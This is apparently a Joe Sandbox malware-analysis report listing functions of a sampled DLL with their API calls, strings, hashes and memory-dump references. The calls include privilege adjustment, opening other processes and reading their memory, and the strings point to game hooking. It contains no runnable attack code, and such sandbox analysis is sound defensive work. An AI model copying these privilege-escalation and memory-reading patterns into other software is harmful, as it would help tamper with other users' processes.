                                                                                  • Opcode ID: 7f02cc5938924e8ac09ebe50bf751a5e9a1119cc796d479bba3fd49836409ba3
                                                                                  • Instruction ID: 40e250ea83cb8e0b1ed884084c77051126e1b2784a73bdfc5e8236a3b8d8313d
                                                                                  • Opcode Fuzzy Hash: 7f02cc5938924e8ac09ebe50bf751a5e9a1119cc796d479bba3fd49836409ba3
                                                                                  • Instruction Fuzzy Hash: 4A31A37250D3C09ED341DF688484A9FBFE2ABDA20CF48495DF0D897252D666C609CB67
                                                                                  Function 6A6D16A0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 82COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 6A6EE09C: _malloc.LIBCMT ref: 6A6EE0BA
                                                                                  • _memset.LIBCMT ref: 6A6D16B9
                                                                                  • _strncpy.LIBCMT ref: 6A6D16F0
                                                                                  • __wfopen_s.LIBCMT ref: 6A6D1704
                                                                                  • OutputDebugStringA.KERNEL32(AddGameDllInfoToList,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6A6D171E
                                                                                  • OutputDebugStringA.KERNEL32(6A71B18C,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6A6D1725
                                                                                  • __wfopen_s.LIBCMT ref: 6A6D1743
                                                                                  • OutputDebugStringA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6A6D1753
                                                                                  • OutputDebugStringA.KERNEL32(6A71B18C,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6A6D175A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugOutputString$__wfopen_s$_malloc_memset_strncpy
                                                                                  • String ID: AddGameDllInfoToList$C:\pl.txt
                                                                                  • API String ID: 235111189-3547190053
                                                                                  • Opcode ID: 526ed89c7b615073ce491fb292c0632d77df273c7c2f865f091ead472dc567af
                                                                                  • Instruction ID: dd063adc3529347b83eec3911e2908c73e8da33b16fa0a380b8591eeb9cc7024
                                                                                  • Opcode Fuzzy Hash: 526ed89c7b615073ce491fb292c0632d77df273c7c2f865f091ead472dc567af
                                                                                  • Instruction Fuzzy Hash: 37219FB1508301ABE704DFA4CD84E6AB7F5BBDA254F094929F65893301DF34E908CBA6
                                                                                  Function 6A6EEDF6 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 60libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(KERNEL32), ref: 6A6EEE1F
                                                                                  • GetProcAddress.KERNEL32(00000000,CreateActCtxA), ref: 6A6EEE3C
                                                                                  • GetProcAddress.KERNEL32(00000000,ReleaseActCtx), ref: 6A6EEE49
                                                                                  • GetProcAddress.KERNEL32(00000000,ActivateActCtx), ref: 6A6EEE56
                                                                                  • GetProcAddress.KERNEL32(00000000,DeactivateActCtx), ref: 6A6EEE63
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$HandleModule
                                                                                  • String ID: ActivateActCtx$CreateActCtxA$DeactivateActCtx$KERNEL32$ReleaseActCtx
                                                                                  • API String ID: 667068680-3617302793
                                                                                  • Opcode ID: f2321e8e495ae5295914db63e195f7cdba34c159f6a9187396fb36d97fc64270
                                                                                  • Instruction ID: 0f1aa0d23139c3b8004b0453373dcbba2a376a10fd965c43fb1737ce28ed9b08
                                                                                  • Opcode Fuzzy Hash: f2321e8e495ae5295914db63e195f7cdba34c159f6a9187396fb36d97fc64270
                                                                                  • Instruction Fuzzy Hash: 1711D072909645FFDB30AF99C984819BEF8B76B31A30544BEE604D7110EF70AD448E55
                                                                                  Function 6A6D98D0 Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 58COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 6A6DD8E0: RtlAdjustPrivilege.NTDLL ref: 6A6DD90C
                                                                                    • Part of subcall function 6A6DD8E0: ZwOpenProcess.NTDLL(?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD94C
                                                                                    • Part of subcall function 6A6DD8E0: ZwOpenProcess.NTDLL(00010000,001FFFFF,?,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD96F
                                                                                    • Part of subcall function 6A6DD8E0: ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD997
                                                                                    • Part of subcall function 6A6DD8E0: ZwQuerySystemInformation.NTDLL(00000010,00000000,00000001,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9B0
                                                                                    • Part of subcall function 6A6DD8E0: ZwFreeVirtualMemory.NTDLL(000000FF,00000014,00000014,00008000,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9C7
                                                                                    • Part of subcall function 6A6DD8E0: ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9F0
                                                                                    • Part of subcall function 6A6DD8E0: ZwQuerySystemInformation.NTDLL(00000010,00000000,00000001,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DDA03
                                                                                  • _memset.LIBCMT ref: 6A6D991B
                                                                                  • ReadProcessMemory.KERNEL32 ref: 6A6D9949
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 6A6D9978
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Memory$ProcessVirtual$AllocateInformationOpenQuerySystem$AdjustCloseFreeHandlePrivilegeRead_memset
                                                                                  • String ID: I$N$P$U$e$w$y
                                                                                  • API String ID: 3693474235-4183856720
                                                                                  • Opcode ID: 977f168967a7f551b21d47b5c68df8bd10053ca2e5ace1f3ab3accf48d848d6a
                                                                                  • Instruction ID: e377734c7bedd933448753dca45514bc6d85e601074dc1f2c2fced5ada9a2289
                                                                                  • Opcode Fuzzy Hash: 977f168967a7f551b21d47b5c68df8bd10053ca2e5ace1f3ab3accf48d848d6a
                                                                                  • Instruction Fuzzy Hash: F111DA7190C3809AD721DB64C844B5F7BD45FC5348F08092CF5899B191CBB88608CBA7
                                                                                  Function 6A6F2FBC Relevance: 17.5, APIs: 5, Strings: 5, Instructions: 28libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(KERNEL32,6A6F30D6,?,?), ref: 6A6F2FCA
                                                                                  • GetProcAddress.KERNEL32(00000000,CreateActCtxW), ref: 6A6F2FEB
                                                                                  • GetProcAddress.KERNEL32(ReleaseActCtx), ref: 6A6F2FFD
                                                                                  • GetProcAddress.KERNEL32(ActivateActCtx), ref: 6A6F300F
                                                                                  • GetProcAddress.KERNEL32(DeactivateActCtx), ref: 6A6F3021
                                                                                    • Part of subcall function 6A6EE232: __CxxThrowException@8.LIBCMT ref: 6A6EE248
                                                                                    • Part of subcall function 6A6EE232: __EH_prolog3.LIBCMT ref: 6A6EE255
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$Exception@8H_prolog3HandleModuleThrow
                                                                                  • String ID: ActivateActCtx$CreateActCtxW$DeactivateActCtx$KERNEL32$ReleaseActCtx
                                                                                  • API String ID: 417325364-2424895508
                                                                                  • Opcode ID: c97252916ba57a2b870a1aef84faa4618cd0be6deb8fa888c4f317396382e4cb
                                                                                  • Instruction ID: 2c7fd6913ac31310c2396f96cdd18d289184640ad5dd89da2f2cd8e71f1b4525
                                                                                  • Opcode Fuzzy Hash: c97252916ba57a2b870a1aef84faa4618cd0be6deb8fa888c4f317396382e4cb
                                                                                  • Instruction Fuzzy Hash: DDF09876819615AECF015FB5CA48906BEF5AB2E21A708447BE900E2210EB74ED098F91
                                                                                  Function 6A6F3BBB Relevance: 16.6, APIs: 11, Instructions: 106memoryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • EnterCriticalSection.KERNEL32(6A72CFE8,?,?,00000000,6A72CFCC,6A72CFCC,?,6A6F4011,00000004,6A6F3920,6A6EE24E,6A6F1768,6A6E4672,00000000), ref: 6A6F3BCE
                                                                                  • GlobalAlloc.KERNEL32(00000002,00000000,?,00000000,6A72CFCC,6A72CFCC,?,6A6F4011,00000004,6A6F3920,6A6EE24E,6A6F1768,6A6E4672,00000000), ref: 6A6F3C24
                                                                                  • GlobalHandle.KERNEL32(07D54248), ref: 6A6F3C2D
                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 6A6F3C37
                                                                                  • GlobalReAlloc.KERNEL32(?,00000000,00002002), ref: 6A6F3C50
                                                                                  • GlobalHandle.KERNEL32(07D54248), ref: 6A6F3C62
                                                                                  • GlobalLock.KERNEL32(00000000), ref: 6A6F3C69
                                                                                  • LeaveCriticalSection.KERNEL32(?,?,00000000,6A72CFCC,6A72CFCC,?,6A6F4011,00000004,6A6F3920,6A6EE24E,6A6F1768,6A6E4672,00000000), ref: 6A6F3C72
                                                                                  • GlobalLock.KERNEL32(00000000), ref: 6A6F3C7E
                                                                                  • _memset.LIBCMT ref: 6A6F3C98
                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,00000001,?,?,?,?,?,?,?,?), ref: 6A6F3CC6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
                                                                                  • String ID:
                                                                                  • API String ID: 496899490-0
                                                                                  • Opcode ID: fcfd62abfd62831ff91ab36d5283e6defd969eb0a734eca80aa86a6c7ab982ad
                                                                                  • Instruction ID: 126def03fba370be6f088b25742fd3b812b83bd2f852cdb48be671551ed0d9d9
                                                                                  • Opcode Fuzzy Hash: fcfd62abfd62831ff91ab36d5283e6defd969eb0a734eca80aa86a6c7ab982ad
                                                                                  • Instruction Fuzzy Hash: 3831B271500705AFDB20CFA5C88EA4ABBFAFF45300B064929E962D3641DF34EC468F54
                                                                                  Function 6A6D1910 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 136COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  • C:\pl.txt, xrefs: 6A6D1A96
                                                                                  • SetSettingsInfo : guaVer : %d, bFree : %d, guanWang : %s, verNum : %s, hotkeyFlag : %d, hookFlag : %d, funcFlag : %d, xrefs: 6A6D1A82
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugOutputString_strncpy$__wfopen_s_memset_sprintf
                                                                                  • String ID: C:\pl.txt$SetSettingsInfo : guaVer : %d, bFree : %d, guanWang : %s, verNum : %s, hotkeyFlag : %d, hookFlag : %d, funcFlag : %d
                                                                                  • API String ID: 477743007-1446027646
                                                                                  • Opcode ID: 6795394ba6fcfeb82cdd2fd0edbcc9b58fdf20a7b9c18577f74ce5e2453ae1ca
                                                                                  • Instruction ID: 71f64cf94c2054a36c70ccb65a2a1354dc408d8b602e9e13282af355bb2619da
                                                                                  • Opcode Fuzzy Hash: 6795394ba6fcfeb82cdd2fd0edbcc9b58fdf20a7b9c18577f74ce5e2453ae1ca
                                                                                  • Instruction Fuzzy Hash: BA51A6B29043459FC764CF68C944B9B7BF5FB8A345F064939E989C7301EB70A909CBA1
                                                                                  Function 6A6D5800 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 110fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,6A6D6513), ref: 6A6D5815
                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,6A6D6513), ref: 6A6D5825
                                                                                  • CloseHandle.KERNEL32(00000000,?,6A6D6513), ref: 6A6D5833
                                                                                  • _malloc.LIBCMT ref: 6A6D5844
                                                                                  • CloseHandle.KERNEL32(00000000,6A6D6513), ref: 6A6D5853
                                                                                  • _memset.LIBCMT ref: 6A6D5867
                                                                                  • ReadFile.KERNEL32(00000000,00000000,000003E8,?,00000000,?,?,?,6A6D6513), ref: 6A6D587D
                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,6A6D6513), ref: 6A6D5884
                                                                                    • Part of subcall function 6A6FE26F: __lock.LIBCMT ref: 6A6FE28D
                                                                                    • Part of subcall function 6A6FE26F: ___sbh_find_block.LIBCMT ref: 6A6FE298
                                                                                    • Part of subcall function 6A6FE26F: ___sbh_free_block.LIBCMT ref: 6A6FE2A7
                                                                                    • Part of subcall function 6A6FE26F: HeapFree.KERNEL32(00000000,?,6A726890,0000000C,6A705ECE,00000000,6A726C18,0000000C,6A705F08,?,?,?,6A70F988,00000004,6A726F98,0000000C), ref: 6A6FE2D7
                                                                                    • Part of subcall function 6A6FE26F: GetLastError.KERNEL32(?,6A70F988,00000004,6A726F98,0000000C,6A706FD8,?,?,00000000,00000000,00000000,?,6A705835,00000001,00000214), ref: 6A6FE2E8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseFileHandle$CreateErrorFreeHeapLastReadSize___sbh_find_block___sbh_free_block__lock_malloc_memset
                                                                                  • String ID: PEC2
                                                                                  • API String ID: 357344292-2409353939
                                                                                  • Opcode ID: 946da63703c4d2bcb8034d1b69057d919db7b9665d8f619733fa73b20c4a4cef
                                                                                  • Instruction ID: 4c7736524a6cc1ee4aea89cf62a09cb01a8c637abf32cabfc8e7b8c9d417dcfe
                                                                                  • Opcode Fuzzy Hash: 946da63703c4d2bcb8034d1b69057d919db7b9665d8f619733fa73b20c4a4cef
                                                                                  • Instruction Fuzzy Hash: 4731AE3120429027F3112A648C4ABDE7BABDB833B1F240879F597FA5D1EF61A8068241
                                                                                  Function 6A6D81F0 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 107fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 6A6D8218
                                                                                    • Part of subcall function 6A6E0470: GetModuleHandleA.KERNEL32 ref: 6A6E052A
                                                                                    • Part of subcall function 6A6E0470: GetProcAddress.KERNEL32(00000000), ref: 6A6E0531
                                                                                    • Part of subcall function 6A6DB0A0: _memset.LIBCMT ref: 6A6DB0C8
                                                                                  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,?), ref: 6A6D825A
                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,?), ref: 6A6D826E
                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?), ref: 6A6D827F
                                                                                  • _malloc.LIBCMT ref: 6A6D828B
                                                                                  • _memset.LIBCMT ref: 6A6D829D
                                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?), ref: 6A6D82AF
                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 6A6D82B6
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
